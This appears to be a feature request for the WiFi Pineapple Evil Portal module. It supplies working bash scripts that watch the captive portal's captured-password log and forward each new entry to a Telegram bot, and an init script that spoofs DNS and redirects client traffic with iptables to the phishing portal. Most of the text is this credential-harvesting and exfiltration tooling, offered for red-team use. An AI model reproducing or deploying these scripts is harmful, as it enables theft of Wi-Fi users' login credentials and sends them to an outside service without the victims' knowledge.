[Evil Portal] Feature Request: notify-ng #54
Description
Short story: Send captured credentials to telegram bot
A couple of years ago I made a bash script that helped me do a hot read of a file and every time that file was updated it sent a message from the telegram bot (https://vay3t.medium.com/creando-un-notificador-en-telegram-con-bash-b842490610)
With that idea I molded it to use it in the wifi pineapple and in this way have telegram notifications for red team campaigns.
/root/notify.sh
#!/bin/bash
function urlencode() {
# urlencode <string>
old_lc_collate=$LC_COLLATE
LC_COLLATE=C
local length="${#1}"
for (( i = 0; i < length; i++ )); do
local c="${1:$i:1}"
case $c in
[a-zA-Z0-9.~_-]) printf '%s' "$c" ;;
*) printf '%%%02X' "'$c" ;;
esac
done
LC_COLLATE=$old_lc_collate
}
token="TOKENOFBOT"
id="IDUSER"
if [ "$1" != "" ]; then
if [ ! -t 0 ]; then
msj="$(cat $1)"
fi
else
msj="beep"
fi
msj=$(urlencode "$msj")
url="https://api.telegram.org/bot$token/sendMessage"
curl -s -X POST "$url" -d chat_id="$id" -d text="$msj" &> /dev/null
if [ $? -ne 0 ]; then
echo "Error with bot"
fi/root/hotreader.sh
#!/bin/bash
file="/www/.logs"
lines=$(cat $file | wc -l)
###while inotifywait -q -e modify $file; do
inotifywait -q -m -e modify $file | while read filename event; do
linesNow=$(cat $file | wc -l)
tail -n $(($linesNow-$lines)) $file > /tmp/out.out && bash /root/notify.sh /tmp/out.out
lines=$linesNow
done/etc/init.d/evilportal
#!/bin/sh /etc/rc.common
# This is the auto-start script for EvilPortal
START=200
start() {
# Enable ip forward.
echo 1 > /proc/sys/net/ipv4/ip_forward
# Remove old authorized clients list
rm /tmp/EVILPORTAL_CLIENTS.txt
/etc/init.d/php7-fpm start
/etc/init.d/nginx start
# Start DNS MASQ to spoof * for unauthorized clients
dnsmasq --no-hosts --no-resolv --address=/#/172.16.42.1 -p 5353
# Symlink evilportal portal api
rm /www/captiveportal
ln -s /pineapple/ui/modules/evilportal/assets/api /www/captiveportal
# Run iptables commands
iptables -t nat -A PREROUTING -i br-lan -p tcp --dport 443 -j DNAT --to-destination 172.16.42.1:80
iptables -t nat -A PREROUTING -i br-lan -p tcp --dport 80 -j DNAT --to-destination 172.16.42.1:80
iptables -t nat -A PREROUTING -i br-lan -p tcp --dport 53 -j DNAT --to-destination 172.16.42.1:5353
iptables -t nat -A PREROUTING -i br-lan -p udp --dport 53 -j DNAT --to-destination 172.16.42.1:5353
sleep 10
bash /root/hotreader.sh &
}
stop() {
/etc/init.d/php7-fpm stop
/etc/init.d/nginx stop
kill $(netstat -plant | grep 5353 | awk '{print $NF}' | sed 's/\/dnsmasq//g' | head -n 1)
rm /www/captiveportal
iptables -t nat -D PREROUTING -i br-lan -p tcp --dport 443 -j DNAT --to-destination 172.16.42.1:80
iptables -t nat -D PREROUTING -i br-lan -p tcp --dport 80 -j DNAT --to-destination 172.16.42.1:80
iptables -t nat -D PREROUTING -i br-lan -p tcp --dport 53 -j DNAT --to-destination 172.16.42.1:5353
iptables -t nat -D PREROUTING -i br-lan -p udp --dport 53 -j DNAT --to-destination 172.16.42.1:5353
kill $(ps aux | grep hotreader.sh | head -2 | awk '{print $2}')
}
disable() {
rm /etc/rc.d/*evilportal
kill $(ps aux | grep hotreader.sh | head -2 | awk '{print $2}')
}I would like to work more but I'm not very good at developing web applications
Notes:
- The log file of the captured passwords should be blocked with an htaccess or any type of protection to the public from the web.
- It is possible that my solution is vulnerable to RCE due to the nature of Bash, but I think that using Python would be a good alternative